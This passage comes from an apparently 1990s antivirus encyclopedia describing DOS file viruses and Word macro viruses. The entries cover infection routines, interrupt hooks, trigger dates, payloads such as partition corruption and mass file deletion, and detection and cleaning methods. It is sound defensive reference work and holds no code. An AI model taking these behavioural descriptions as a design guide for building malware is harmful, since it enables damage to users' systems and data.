  7777.    modifications on the Partition to keep the system from booting
  7778.    correctly.
  7779.  
  7780. Infection Procedure:
  7781. 1) Hooks INT 21h to check whether it is memory resident.
  7782. 2) Hooks INT 21(AX=4B00h) to infect files. If the program to be
  7783.    executed is an uninfected COM file, the virus infects it.
  7784.  
  7785. Damage: When the virus activates, it makes the screen flash once.
  7786. Then it changes data in the Partition. The change is achieved by
  7787. XORing every fourth byte of the four Partition records with 55 (there
  7788. are four Partition records in the Partition table).
  7789.  
  7790. Note: The date and time fields of infected files are not changed.
  7791.  
  7792. Detection method:  Infected files increase by 976 bytes.
  7793.  
  7794. [AST-1010]
  7795. Virus Name: Ast-1010
  7796. Virus Type: Memory Resident, File Virus (COM and EXE files)
  7797. Virus Length: 1,010 bytes
  7798. PC Vectors Hooked:  INT 21h
  7799.  
  7800. Execution Procedure:
  7801. 1) The virus decodes.
  7802. 2) Checks whether it is memory resident. If not, it loads itself
  7803.     resident in the high memory.
  7804. 3) Hooks INT21h and infects all COM and EXE files on the current
  7805.     directory (it does not infect the same file again).
  7806. 4) Checks whether the current day is the 16th. If it is, it makes
  7807.     changes to the Partition to keep the system from booting correctly.
  7808.  
  7809. Infection Procedure:
  7810. 1) Hooks INT 21h to check whether it is memory resident.
  7811. 2) Hooks INT 21(AX=4B00h) to infect files. If the program to be
  7812.     executed is an uninfected COM or EXE file, the virus infects it.
  7813.  
  7814. Damage: When the virus activates, it makes the screen flash once.
  7815. Then it modifies the Partition. The change is achieved by
  7816. XORing every fourth byte of four Partition records with 55 (there
  7817. are four Partition records in the partition table).
  7818.  
  7819. Note:
  7820. 1) Date and time fields of infected files are not changed.
  7821. 2) The method of checking whether the virus is memory resident
  7822.     is the same as the AST-976 virus. Thus, these two viruses can
  7823.     not stay memory resident at the same time.
  7824.  
  7825. Detection method: Infected files increase by 1010 bytes.
  7826.  
  7827. [Filler]
  7828. Virus Name: Filler
  7829. Virus Type: File Virus
  7830.  
  7831. Execution Procedure: When an infected file is executed, the virus
  7832. writes some garbage information into some sectors on the floppy
  7833. inserted in the A drive.
  7834.  
  7835. Damage: Destroys some sectors in the diskette inserted in the A
  7836. drive (starts from 0 side, 28 track, 1 sectors, damages 8 sectors).
  7837.  
  7838. [Path]
  7839. Virus Name: Path
  7840. Virus Type: File Virus (COM files)
  7841. Virus Length:  3+906 bytes
  7842.  
  7843. Execution Procedure:
  7844. 1) Decodes its later half.
  7845. 2) Checks for other infected files. If there is, it only infects
  7846.    one program. Otherwise, it goes back to run the original routine.
  7847.    The search path is the path set in PATH.
  7848.  
  7849. The condition for the infectable file is that it must be an uninfected
  7850. COM file with length between 10 bytes and 64000 bytes.
  7851.  
  7852. Damage: None
  7853.  
  7854. Note:
  7855. 1) Does not stay resident in memory.
  7856. 2) Date and time fields of infected files are not changed.
  7857. 3) Infected files increase by 906+G bytes (0<=G<=247).
  7858.  
  7859. [Flower]
  7860. Virus Name: Flower
  7861. Virus Type: File Virus (EXE files)
  7862. Virus Length:  883 bytes
  7863.  
  7864. Execution Procedure:
  7865. 1) Decodes its encoded section.
  7866. 2) Checks whether the current date is November 11, or whether the
  7867.     virus version is not less than 174. If one of these conditions is
  7868.     satisfied, the virus destroys the original program (Document) and
  7869.     goes back to run the original routine. Otherwise, it searches for
  7870.     the first uninfected file on the current directory and infects it.
  7871.     Then it searches for the first uninfected file on the subdirectory
  7872.     under the root directory
  7873.    and infects it.
  7874. 3) Goes back to run the original routine.
  7875.  
  7876. Every infected file has its own number. When it infects a file, it
  7877. increases the current number by 1. This number will be delivered to the
  7878. next infection process.
  7879.  
  7880. Damage: When the virus activates, the virus attaches a procedure
  7881. to the original procedure to display a message (An English poem whose
  7882. title is "FLOWER"). Then it destroys the original procedure by
  7883. overwriting its front data.
  7884.  
  7885. Note: Date fields of infected files are not changed; however, the
  7886. time fields are changed due to the encoding of the time fields.
  7887.  
  7888. [Grunt-3]
  7889. Virus Name: Grunt-3
  7890. Virus Type: File Virus (COM files)
  7891. Virus Length:  3+473 bytes
  7892.  
  7893. Execution Procedure:
  7894. 1) Decodes its later half section.
  7895. 2) Checks if there is an uninfected COM or EXE file on the current
  7896.     and all father directories. If there is, it checks whether the
  7897.     current year is not less than 1993 and it is Friday. If it is,
  7898.     it does not infect any files except for displaying the following:
  7899.  
  7900.     "This is a hot  LZ ...Eradicating the Enemy!".
  7901.  
  7902.     Otherwise, the virus infects it (it only infects one file at a
  7903.     time).
  7904.  
  7905. Damage: None
  7906.  
  7907. Note:
  7908. 1) Does not stay resident in memory.
  7909. 2) Date and time fields of infected files are not changed.
  7910.  
  7911. Detection method: Infected files increase by 473 bytes.
  7912.  
  7913. [Ultrasik-1967]
  7914. Virus Name: Ultrasik-1967
  7915. Virus Type: File Virus (EXE files)
  7916. Virus Length:  1967 bytes
  7917.  
  7918. Execution Procedure: Searches for an uninfected EXE file and
  7919. infects it. The searching path is from the current directory to its
  7920. subdirectory, to subdirectories under the last subdirectory, to the
  7921. root directory, to subdirectories under the root directory. After that,
  7922. it goes back to the original routine. If there is no infectable file,
  7923. it halts the system (the original plan is to format C. But it instead
  7924. halts the system due to a bad instruction in the viral code).
  7925.  
  7926. Damage: None
  7927.  
  7928. Note: Date and time fields of infected files are not changed.
  7929.  
  7930. Detection method:
  7931. 1) Infected files will increase.
  7932. 2) The algorithm is: First, add original length to let it become a
  7933.     multiple of 16. Then increases it by 1967 bytes.
  7934.  
  7935.  
  7936. [Madden]
  7937. Virus Name: Madden
  7938. Virus Type: File Virus (EXE files)
  7939. Virus Length:  1988 bytes
  7940.  
  7941. Execution Procedure: Searches for an uninfected EXE file and
  7942. infects it. The searching path is from the current directory to its
  7943. subdirectory, to the subdirectories under the last subdirectory, to the
  7944. root directory, to the subdirectories under root directory. After that,
  7945. it goes back to the original routine. If there is no infectable file,
  7946. the virus issues a strange sound that stops only when the system is
  7947. rebooted.
  7948.  
  7949. Damage: None
  7950.  
  7951. Note: Date and time fields of infected files are not changed.
  7952.  
  7953. Detection method:
  7954. 1) Infected files increase.
  7955. 2) The algorithm is: First add to the original length to let it become
  7956.     a multiple of 16, and then increase it by 1988 bytes.
  7957.  
  7958. [Madden-B]
  7959. Virus Name: Madden-B
  7960. Virus Type: File Virus (EXE files)
  7961. Virus Length:  1440 bytes
  7962.  
  7963. Execution Procedure: Searches for an uninfected EXE file and
  7964. infects it. The searching path is from the current directory to its
  7965. subdirectory, to the subdirectories under the last subdirectory, to the
  7966. root directory, to the subdirectories under the root directory. After
  7967. that, it goes back to the original routine. If there is no infectable
  7968. file, the virus issues a sound from high to low, from low to high, and
  7969. so on until the system is rebooted.
  7970.  
  7971. Damage: None
  7972.  
  7973. Note: Date and time fields of infected files are not changed.
  7974.  
  7975. Detection method:
  7976. 1) Infected files increase in length.
  7977. 2) The algorithm is: First add original length to let it become a
  7978.     multiple of 16, and then increase it by 1440 bytes.
  7979.  
  7980. [Prime]
  7981. Virus Name: Prime
  7982. Virus Type: File Virus (*.C*; mainly *.COM)
  7983. Virus Length:  580 bytes
  7984.  
  7985. PC Vectors Hooked: INT 01h, INT 03h, INT 24h
  7986.  
  7987. Execution Procedure:
  7988. 1) It decodes its later half section.
  7989. 2) Checks whether the current day is 1. If it is, it displays a message
  7990.    and rotates the screen from left to right once. No matter what
  7991.    the day is, it searches for an uninfected file on the current
  7992.    directory and infects it.
  7993. 3) Then ends.
  7994.  
  7995. Infection Procedure:
  7996. 1) Gets the original codes and encodes them with F3h.
  7997. 2) Gets the system time and encodes it with the virus' later half codes.
  7998. 3) Attaches virus code to the original file, followed by the original
  7999.    codes.
  8000.  
  8001. Hooks INT 01h, INT 03h to avoid the Debug program.
  8002. When this program is executed, it jumps to FE05Bh to reboot the
  8003. system. Hooks INT 24h to prevent write protection on the current
  8004. diskette. When INT 24h is called, it halts the system because
  8005. of a bad viral code.
  8006.  
  8007. Damage: Original programs are encoded, preventing them to execute
  8008. after the virus is executed.
  8009.  
  8010. Note:
  8011. 1) Does not stay resident in the memory.
  8012. 2) The virus halts the system when it detects an uninfectable
  8013.    *.C* file on the current directory.
  8014. 3) Date and time fields of infected files are not changed.
  8015.  
  8016. Detection method: Infected files increase by 580 bytes.
  8017.  
  8018. Cleaning Method: Delete the first 580 bytes on infected files. The
  8019. remaining bytes will XOR with F3h one by one.
  8020.  
  8021. [PSV-354]
  8022. Virus Name: Psv-354
  8023. Virus Type: File Virus (COM files)
  8024. Virus Length:  354 bytes
  8025.  
  8026. Execution Procedure:
  8027. 1) It decodes its later half section.
  8028. 2) Checks for uninfected COM files with lengths between 150 bytes
  8029.    and 65000 bytes. If there is/are, only infects one of them.
  8030.    Otherwise, it goes back to run the original routine.
  8031.  
  8032. Damage: None
  8033.  
  8034. Note:
  8035. 1) Does not stay resident in the memory.
  8036. 2) Date and time fields of infected files are not changed.
  8037. 3) Does not infect COMMAND.COM of DOS 5.0.
  8038.  
  8039. Detection method: Infected files increase by 354 bytes.
  8040.  
  8041. [PCBB]
  8042. Virus Name: Pcbb
  8043. Virus Type: Memory resident, File Virus (COM files)
  8044. Virus Length:  3+(1675-1687) bytes
  8045. PC Vectors Hooked: INT 09h, INT 1Ch, INT 21h
  8046.  
  8047. Execution Procedure:
  8048. 1) It decodes its later half section.
  8049. 2) Checks whether it is memory resident or not. If not, it
  8050.     loads itself resident into the high memory.
  8051. 3) Hooks  INT 21h,INT 09h,INT 1Ch and goes back to run the
  8052.     original routine.
  8053.  
  8054. Infection Procedure: Infection occurs when executing a program,
  8055. copying a file, changing the file's attribute, opening a file,
  8056. closing a file, or renaming a file (AH=56h). When it
  8057. infects a file, it checks first for the day of the week and selects
  8058. the corresponding encoding mode for that day. There are seven possible
  8059. encoding modes.
  8060.  
  8061. The virus does not infect the same file, and only infects files with
  8062. lengths between 16 bytes and 61440 bytes.
  8063.  
  8064. Symptom: While the virus is activated, the screen goes blank when the
  8065. total number of keys pressed is equal to 957. After this, the virus
  8066. resets the counter and restarts all over again. You can press the
  8067. Alt, Control, Shift left and right together to return the screen to
  8068. normal operation.
  8069.  
  8070. Damage: None
  8071.  
  8072. Note: It stays resident in the memory and uses 4K bytes.
  8073.  
  8074. Detection method:
  8075. 1) Date and time fields of infected files are changed.
  8076. 2) Infected files increase by 1675, 1677, 1679, 1679, 1680, 1683, or
  8077.     1687 bytes depending on the day (from Sunday to Saturday
  8078.     respectively).
  8079. 3) PCBB attaches itself at the end of infected files.
  8080.  
  8081. [Comspec]
  8082. Virus Name: Comspec
  8083. Virus Type: File Virus
  8084. Virus Length:  3424 bytes
  8085.  
  8086. Execution Procedure:
  8087. 1) Executes COMMAND.COM to create six copies of the virus file
  8088.    using six file names from the C:\DOS directory. These copies
  8089.    are saved in the current directory. If there is no C:\DOS
  8090.    directory, it creates a file named "COMSPEC."
  8091.  
  8092. Damage: It overwrites six files if it is executed in the C:\DOS
  8093. directory.
  8094.  
  8095. Detection method: Length of infected files is 3424.
  8096.  
  8097. [T-1000]
  8098. Virus Name: T-1000
  8099. Virus Type: File Virus (COM files)
  8100. Virus Length:  128 bytes
  8101.  
  8102. Execution Procedure:
  8103. 1) It decodes its later half section.
  8104. 2) Infects all COM files in the current directory.
  8105.  
  8106. Infection Procedure:
  8107. 1) Gets the system time and encodes it with the original
  8108.    procedure.
  8109. 2) Overwrites its first 128 bytes by the virus code. If it is
  8110.    less than 128 bytes, it will be 128 bytes after it has been
  8111.    infected. Otherwise, the size will not change.
  8112.  
  8113. Damage: Overwrites the first 127 bytes of the original file with
  8114. the virus code, thus corrupting the file.
  8115.  
  8116. Detection method: Date and time fields of infected files are changed.
  8117.  
  8118. [Seneca]
  8119. Virus Name: Seneca
  8120. Virus Type: File Virus (EXE files)
  8121. Virus Length:  392 bytes
  8122.  
  8123. Execution Procedure: The virus gets the system date and time and
  8124. infects the system depending on the following conditions:
  8125. (1)Current year is not larger than 1980 and current minute is
  8126.    less than 30, or current year is larger than 1980 and current
  8127.    day is not November 25: It infects all EXE files on the
  8128.    current and all father directories.
  8129. (2)Current  year is not larger than 1980 and current minute is
  8130.    not less than 30: It displays this message: "You shouldn't
  8131.    use your computer so much, it's bad for you and your computer."
  8132.    Then destroys the current diskette.
  8133. (3)Current year is larger than 1980 and current day is November
  8134.    25: It displays the following message:
  8135.  
  8136.        "HEY EVERYONE!!!"
  8137.        "Its Seneca's B-Day !  Let's Party!"
  8138.  
  8139.    Then destroys the current diskette. The method of destroying
  8140.    the diskette for (2) and (3) is:  Write some data onto the first
  8141.    255 sectors of the diskette, thus deleting important data on
  8142.    it.
  8143.  
  8144. Damage: In condition (1), infected files are destroyed because their
  8145. first 392 bytes are overwritten. In condition (2) and (3), the first
  8146. 255 sectors of the diskette are overwritten.
  8147.  
  8148. Note: Date and time fields of infected files are not changed.
  8149.  
  8150. Detection method: One of the messages above appears on the screen.
  8151.  
  8152. [Word_Baby.A]
  8153.  
  8154. Virus Name: Word.Baby.A
  8155. Virus Type: Word Macro Virus
  8156. Alias: Punten
  8157. Platform: Word 6/7
  8158. Number_of_macros: 10
  8159. Encrypted: Yes
  8160. Size_of_macros: 4322 Bytes
  8161. Place_of_origin: Unknown
  8162. Date_of_origin: Spring 1997
  8163. Payload: Yes
  8164. Trigger_date: March 24th, October 15th, 1st, 30th, September 21st
  8165. Password: None
  8166. Seen_In_The_Wild: No
  8167. Seen_where: UK
  8168.  
  8169. DESCRIPTION:
  8170.  
  8171. Word.Baby.A infects the global template (normal.dot) when an infected
  8172. document is opened. Further documents become infected when they
  8173. are also opened and saved (FileSave and FileSaveAs).
  8174. Baby.A uses ToolsMacro and ToolsCustomize to make recognition
  8175. of an infected document more difficult (called macro stealth technique).
  8176. When a user selects ToolMacro/ToolsCustomize, the following message is
  8177. displayed:
  8178.  
  8179. "   57773LKOM !   "
  8180.  
  8181. The following messages are displayed when a user exits Microsoft Word:
  8182.  
  8183. On the 24th of March:
  8184.  
  8185. "   Stop Work Let's Party, this is my Day !   "
  8186.  
  8187. On the 1st after 3 p.m:
  8188.  
  8189. "   57773LK0M !   "
  8190.  
  8191. On the 15th of October:
  8192.  
  8193. "GiE, You're gettin' Old, Bro !"
  8194.  
  8195. On the 21st of September:
  8196.  
  8197. "   Cathy, this is your day. Have Fun !   "
  8198.  
  8199. When a document is printed on the 30th of each month, Baby.A inserts
  8200. the following text into the active document:
  8201.  
  8202. "   Punten ...   "
  8203. "   I Just Wanna Give a Shut Up to @Rapi.Kom:    "
  8204. "   Just Don't Make Any Destructive Virus Ok !   "
  8205. "   Insert "We're East-Man Remember !   "
  8206. "   Insert "Peace 2 all My Home-Bro' Out There !   "
  8207. "   Insert "I'm Outta here !! Mangga sadayana...    "
  8208.  
  8209. [Word_Balu.A]
  8210.  
  8211. Virus Name: Word.Balu.A
  8212. Virus Type: Word Macro Virus
  8213. Alias: None
  8214. Platform: Word 6/7
  8215. Number_of_macros: 2 or 1
  8216. Encrypted: Yes
  8217. Size_of_macros: 776 or 646 Bytes
  8218. Place_of_origin: Germany
  8219. Date_of_origin: Spring 1997
  8220. Payload: Yes
  8221. Trigger_date: April 5th, April 16th
  8222. Password: SSichliebeDich, SSICHLIEBEDICH
  8223. Seen_In_The_Wild: No
  8224. Seen_where:
  8225.  
  8226. DESCRIPTION:
  8227.  
  8228. Word.Balu does not infect any other documents. It is classified as a
  8229. trojan horse.
  8230.  
  8231. Balu only works with the German version of Microsoft Word, since it
  8232. uses language specific macros.
  8233.  
  8234. On the 5th of April, Balu renames the following files:
  8235.  
  8236. "   c:\command.com" to "c:\kniffel\com.com   "
  8237. "   c:\msdos.sys" to "c:\kniffel\ms.sys   "
  8238. "   c:\io.sys" to "c:\kniffel\ii.sys   "
  8239.  
  8240. Balu's second payload adds the following password to saved documents:
  8241.  
  8242. "   SSichliebeDich   "
  8243. "   SSICHLIEBEDICH   "
  8244.  
  8245. On the 16th of April, Balu displays the following message:
  8246.  
  8247. "   Dicke aus Schwelm, ich werde Dich immer lieben, weil die Tⁿr
  8248. "   zu meinem Herzen immer fⁿr Dich offen steht, egal was passiert.  "
  8249. "   Ich hoffe Du verzeihst mir.   "
  8250. "   Dein balu aus Schwelm   "
  8251.  
  8252. [Word_Barbaro.A:It]
  8253.  
  8254. Virus Name: Word.Barbaro.A:It
  8255. Virus Type: Word Macro Virus
  8256. Alias: Nostradamus
  8257. Platform: Word 6/7
  8258. Number_of_macros: 3
  8259. Encrypted: No
  8260. Size_of_macros: 2813 Bytes
  8261. Place_of_origin: Italy
  8262. Date_of_origin: December 1996
  8263. Payload: Yes
  8264. Trigger_date: 31st
  8265. Password: None
  8266. Seen_In_The_Wild: No
  8267. Seen_where:
  8268.  
  8269. DESCRIPTION:
  8270.  
  8271. Word.Barbaro infects the global template when an infected document
  8272. is opened. Further documents become infected when they are
  8273. saved (FileSalva).
  8274.  
  8275. Word.Barbaro uses StrumMacro to make recognition of an infected
  8276. document more difficult (called macro stealth technique).
  8277.  
  8278. On the 31st of each month, Barbaro displays the following message:
  8279.  
  8280. "Barbaro impero dal terzo sarai soggiogato   "
  8281. "Gran parte d'individui della sua origine farα perire   "
  8282. "Per decesso senile avverrα la sua fine, il quarto colpirα   "
  8283. "Per timore che il sangue con il sangue morte ne derivi.   "
  8284. "   NOSTRADAMUS Virus   "
  8285.  
  8286. Word.Barbaro only works with the Italian version of Microsoft Word,
  8287. since it uses language specific macros.
  8288.  
  8289. [Word_ABC.A]
  8290.  
  8291. Virus Name: Word.ABC.A
  8292. Virus type:  Word Macro Virus
  8293. Alias: None
  8294. Platform: Word 6/7
  8295. Number_of_macros: 3
  8296. Encrypted: Yes
  8297. Size_of_macros: 1836 (1801) Bytes
  8298. Place_of_origin: USA
  8299. Date_of_origin: Fall 1996
  8300. Destructive: No
  8301. Trigger_date: None
  8302. Password: None
  8303. Seen_In_The_Wild: No
  8304. Seen_where:
  8305.  
  8306. DESCRIPTION:
  8307.  
  8308. Word.ABC.A infects the global template (normal.dot) when an infected
  8309. document is opened. Further documents become infected when they
  8310. are saved (FileSaveAs).
  8311.  
  8312. Word.ABC.A is one of the very few non-destructive macro viruses. It
  8313. only infects other files and displays the following message:
  8314.  
  8315. "     I am happy; are you too?   "
  8316.  
  8317. When the "Colin" macro triggers, it adds the following text to the
  8318. File|Properties section of infected documents:
  8319.  
  8320. "   Smash Technology   "
  8321.  
  8322. "   Resist Oppression   "
  8323.  
  8324. [Word-CeeFour.A]
  8325.  
  8326. Virus Name: Word.Ceefour.A
  8327. Virus Type: Word Macro Virus
  8328. Alias: None
  8329. Platform: Word 6/7
  8330. Number_of_macros: 6
  8331. Encrypted: Yes
  8332. Size_of_macros: 4062 Bytes
  8333. Place_of_origin: USA
  8334. Date_of_origin: Spring 1997
  8335. Destructive: Yes
  8336. Trigger_date: April 1st
  8337. Password: None
  8338. Seen_In_The_Wild: No
  8339. Seen_where:
  8340.  
  8341. DESCRIPTION:
  8342.  
  8343. Word.CeeFour.A infects the global template when an infected document
  8344. is opened. Further documents become infected when they are
  8345. saved.
  8346.  
  8347. Word.CeeFour.A uses ToolsMacro and FileTemplates to make recognition of
  8348. an infected document more difficult (called macro stealth technique).
  8349.  
  8350. When a user selects on of the two options, CeeFour.A displays the
  8351. following message:
  8352.  
  8353. "   A serious error has occoured in sub program: MenuBar   "
  8354.  
  8355. When a document is saved on April 1st, CeeFour.A triggers and does the
  8356. following:
  8357.  
  8358. 1. LABEL the partition of the first hard drive to "   C4_BY_KARL   "
  8359.  
  8360. 2. Delete all files on C:\
  8361.  
  8362. 3. Delete C:\COMMAND.COM
  8363.  
  8364. 4. Delete C:\WINDOWS\WIN.COM
  8365.  
  8366. The following comments can be found in the CEEFOUR macro:
  8367.  
  8368. "   C-4 By Karl   "
  8369. "   You are about to have a very bad day.   "
  8370. "   It looks like C4 in the mothers arm.   "
  8371. "   We are both professional, This is personal.   "
  8372. "   And when Alexander saw the bredth of his domain he wept for there "
  8373. "   were no more worlds to conquer (benefits of a classical education)"
  8374. "   quotes from the masters!   "
  8375.  
  8376. [Word_CeeFour.B]
  8377.  
  8378. Virus Name: Word.Ceefour.B
  8379. Virus Type: Word Macro Virus
  8380. Alias: None
  8381. Platform: Word 6/7
  8382. Number_of_macros: 6
  8383. Encrypted: Yes
  8384. Size_of_macros: 4019 Bytes
  8385. Place_of_origin: UK
  8386. Date_of_origin: February 1997
  8387. Destructive: Yes
  8388. Trigger_date: April 1st
  8389. Password: None
  8390. Seen_In_The_Wild: Yes
  8391. Seen_where: UK
  8392.  
  8393. DESCRIPTION:
  8394.  
  8395. The main difference between this new variant and the previous
  8396. CeeFour.A virus is that the code has been slightly modified.
  8397.  
  8398. For more information, please refer to the CeeFour.A virus
  8399. description.
  8400.  
  8401.  
  8402. [Word_Chaka.A]
  8403.  
  8404. Virus Name: Word.Chaka.A
  8405. Virus Type: Word Macro Virus
  8406. Alias: None
  8407. Platform: Word 6/7
  8408. Number_of_macros: 1 or 3
  8409. Encrypted: No
  8410. Size_of_macros: 741 (845 or 843) Bytes
  8411. Place_of_origin: Germany
  8412. Date_of_origin: Summer 1997
  8413. Destructive: No
  8414. Trigger_date: None
  8415. Password: None
  8416. Seen_In_The_Wild: No
  8417. Seen_where:
  8418.  
  8419. DESCRIPTION:
  8420.  
  8421. Word.Chaka.A infects the global template when an infected document is
  8422. opened. Further documents become infected when they are also
  8423. opened (FileOpen - DateiOeffnen in the German version of Microsoft
  8424. Word) or closed (DocClose - DateiSchliessen in the German version of
  8425. Microsoft Word).
  8426.  
  8427. Word.Chaka does not do anything besides infecting other files.
  8428.  
  8429. [Word_Chandigarh.A]
  8430.  
  8431. Virus Name: Word.Chandigarh.A
  8432. Virus Type:  Word Macro Virus
  8433. Alias: None
  8434. Platform: Word 6/7
  8435. Number_of_macros: 1
  8436. Encrypted: Yes
  8437. Size_of_macros: 244 Bytes
  8438. Place_of_origin: India
  8439. Date_of_origin: May 1996
  8440. Destructive: No
  8441. Trigger_date: None
  8442. Password: None
  8443. Seen_In_The_Wild: No
  8444. Seen_where:
  8445.  
  8446. DESCRIPTION:
  8447.  
  8448. Word.Chandigarh.A infects the global template when an infected document
  8449. is opened. Further documents become infected when they are also
  8450. opened (AutoOpen).
  8451.  
  8452. Word.Chandigarh.A does nothing else besides infecting other files.
  8453.  
  8454. The following comment can be found inside the code of Chandigarh:
  8455.  
  8456. "   This Code was written in Chandigarh (India) on 01.05.1996   "
  8457.  
  8458.  
  8459. [Word_Cheat.A]
  8460.  
  8461. Virus Name: Word.Cheat.A
  8462. Virus Type:  Word Macro Virus
  8463. Alias: None
  8464. Platform: Word 6/7
  8465. Number_of_macros: 1
  8466. Encrypted: No
  8467. Size_of_macros: 249 Bytes
  8468. Place_of_origin: Unknown
  8469. Date_of_origin: Summer 1997
  8470. Destructive: No
  8471. Trigger_date: None
  8472. Password: None
  8473. Seen_In_The_Wild: No
  8474. Seen_where:
  8475.  
  8476. DESCRIPTION:
  8477.  
  8478. Word.Cheat.A is another intended macro virus. Due to bugs in the code
  8479. it does not infect other files.
  8480.  
  8481.  
  8482. [Word.Cheat.B]
  8483.  
  8484. Virus Name: Word.Cheat.B
  8485. Virus Type: Word Macro Virus
  8486. Alias: None
  8487. Platform: Word 6/7
  8488. Number_of_macros: 1
  8489. Encrypted: No
  8490. Size_of_macros: 279 Bytes
  8491. Place_of_origin: Unknown
  8492. Date_of_origin: Summer 1997
  8493. Destructive: No
  8494. Trigger_date: None
  8495. Password: None
  8496. Seen_In_The_Wild: No
  8497. Seen_where:
  8498.  
  8499. DESCRIPTION:
  8500.  
  8501. Word.Cheat.B is another intended macro virus. Due to bugs in the code
  8502. it does not infect other files.
  8503.  
  8504.  
  8505.  
  8506. [Word_Vicis.A]
  8507.  
  8508. Virus Name: Word.Vicis.A
  8509. Virus Type: Word Macro Virus
  8510. Alias: Vicissitator
  8511. Platform: Word 6/7
  8512. Number_of_macros: 1 or 2 (global template)
  8513. Encrypted: No
  8514. Size_of_macros: differs
  8515. Place_of_origin: Unknown
  8516. Date_of_origin: July 1997
  8517. Destructive: No
  8518. Trigger_date: None
  8519. Password: None
  8520. Seen_In_The_Wild: No
  8521. Seen_where:
  8522.  
  8523. DESCRIPTION:
  8524.  
  8525. Word.Vicis.A infects the global template when an infected document is
  8526. saved. Further documents become infected when they are also
  8527. saved (FileSave).
  8528.  
  8529. Word.Vicis.A is another polymorphic virus that changes itself.
  8530. Whenever a user saves a document while the global template (normal.dot)
  8531. is infected, Word.Vicis.A calls its mutating code.
  8532.  
  8533. Due to a bug some variants will fail to infect further files.
  8534. Executing the corrupted FileSave macro causes Microsoft Word to
  8535. display an error message.
  8536.  
  8537. While simple scan string scanners should have no problem
  8538. detecting Vicis.A, exact CRC scanners will fail to do so.
  8539.  
  8540. Word.Vicis.A uses ToolsMacro to make recognition of an infected
  8541. document more difficult (called macro stealth technique).
  8542. The following comment can be found within the ToolsMacro macro:
  8543.  
  8544. "   You have been Infected by the Vicissitator Macro Virus.   "
  8545. "   (C)1997 CyberYoda A Member of the SLAM Virus Team   "
  8546.  
  8547. Word.Vicis.A was distributed in July, 1997 in a virus writing magazine.
  8548.  
  8549.  
  8550. [Word_Black.A]
  8551.  
  8552. Virus Name: Word.Black.A
  8553. Virus Type: Word Macro Virus
  8554. Alias: BlackDeath
  8555. Platform: Word 6/7
  8556. Number_of_macros: 3
  8557. Encrypted: Yes
  8558. Size_of_macros: 1355 Bytes
  8559. Place_of_origin: USA
  8560. Date_of_origin: June 1997
  8561. Destructive: Yes
  8562. Trigger_date: Friday 13th
  8563. Password: None
  8564. Seen_In_The_Wild: No
  8565. Seen_where:
  8566.  
  8567. DESCRIPTION:
  8568.  
  8569. Word.Black infects the global template when an infected document
  8570. is opened. Further documents become infected when they are
  8571. also opened (AutoOpen).
  8572.  
  8573. The following comment can be found in the AutoExec macro:
  8574.  
  8575. "   REM  Fuck Micro$oft!   "
  8576.  
  8577. On Friday the 13th Black displays the following message:
  8578.  
  8579. "   Your computer is now lost to the ages...   "
  8580. "   WM.BlackDeath   "
  8581. "   Written on 6/6/1997   "
  8582.  
  8583. On the same day, Black deletes the following files:
  8584.  
  8585. "   C:\*.COM   "
  8586. "   C:\*.EXE   "
  8587. "   C:\WINDOWS\*.INI   "
  8588. "   C:\WINDOWS\*.COM   "
  8589. "   C:\WINDOWS\*.HLP   "
  8590. "   C:\WINDOWS\*.CPL
  8591. "   C:\WINDOWS\*.BMP   "
  8592. "   C:\AOL\ORGANIZER\*.*   "
  8593. "   C:\AOL\LDB\*.*   "
  8594.  
  8595.  
  8596.  
  8597. [Word_AntiConcept.A]
  8598.  
  8599. Virus Name: Word.AntiConcept.A
  8600. Virus Type: Word Macro Virus
  8601. Alias: None
  8602. Platform: Word 6/7
  8603. Number_of_macros: 4 or 3
  8604. Encrypted: No
  8605. Size_of_macros: 1263 (1216) Bytes
  8606. Place_of_origin: USA
  8607. Date_of_origin: Summer 1997
  8608. Payload: No
  8609. Trigger_date: None
  8610. Password: None
  8611. Seen_In_The_Wild: No
  8612. Seen_where:
  8613.  
  8614. DESCRIPTION:
  8615.  
  8616. Word.AntiConcept.A infects the global template (normal.dot) when an
  8617. infected document is opened. Further documents become infected when
  8618. they are saved (FileSave and FileSaveAs).
  8619.  
  8620. Word.AntiConcept.A disables the Concept virus by removing some of its
  8621. macros.
  8622.  
  8623. When an infected document is opened for the first time,
  8624. Word.AntiConcept displays the following message:
  8625.  
  8626. "   Your system may or may not be clean.   "
  8627. "   Please close CleanW and then open it again   "
  8628.  
  8629. Word.AntiConcept.A is an unnatural devolved variant with FileNew
  8630. missing in its macro set. Due to the missing macro, Microsoft Word
  8631. displays an error message.
  8632.  
  8633.  
  8634.  
  8635. [Word_Archer.A]
  8636.  
  8637. Virus Name: Word.Archer.A
  8638. Virus Type: Word Macro Virus
  8639. Alias: ArchFiend
  8640. Platform: Word 6/7
  8641. Number_of_macros: 6
  8642. Encrypted: No
  8643. Size_of_macros: 2360 Bytes
  8644. Place_of_origin: USA
  8645. Date_of_origin: July 1997
  8646. Payload: Yes
  8647. Trigger_date: 5th
  8648. Password: Random
  8649. Seen_In_The_Wild: No
  8650. Seen_where:
  8651.  
  8652. DESCRIPTION:
  8653.  
  8654. Word.Archer.A infects the global template (normal.dot) when an infected
  8655. document is opened. Further documents become infected when they
  8656. are also opened and saved (FileSaveAs).
  8657.  
  8658. Word.Archer.A removes FileTemplates and ToolsCustomize to make
  8659. recognition of an infected document more difficult (called macro stealth
  8660. technique).
  8661.  
  8662. When a user selects ToolsMacro, Word.Archer.A adds the following
  8663. comment to C:\AUTOEXEC.BAT:
  8664.  
  8665. "   echo BLOW ME!   "
  8666.  
  8667. Word.Archer.A also checks the system time and in case of a 13 in the
  8668. seconds field, it adds a password to the saved document. If you find a
  8669. document with an unknown password, please download a copy of WinWord
  8670. Password Recovery Tool (wwprt). It is available at: www.vdsarg.com.
  8671.  
  8672. The second payload, which is triggered on the 5th of each month, tries
  8673. to delete files on Macintosh systems or delete all bitmap (*.BMP) files
  8674. in the following directory:
  8675.  
  8676. "   C:\WINDOWS   "
  8677.  
  8678.  
  8679.  
  8680. [Word_Armadillo.A]
  8681.  
  8682. Virus Name: Word.Armadillo.A
  8683. Virus Type: Word Macro Virus
  8684. Alias: None
  8685. Platform: Word 6/7
  8686. Number_of_macros: 4
  8687. Encrypted: Yes
  8688. Size_of_macros: 1265 Bytes
  8689. Place_of_origin: USA
  8690. Date_of_origin: Spring 1997
  8691. Payload: Yes
  8692. Trigger_date: Mondays
  8693. Password: None
  8694. Seen_In_The_Wild: No
  8695. Seen_where:
  8696.  
  8697. DESCRIPTION:
  8698.  
  8699. Word.Armadillo.A infects the global template (normal.dot) when an
  8700. infected document is opened. Further documents become infected when
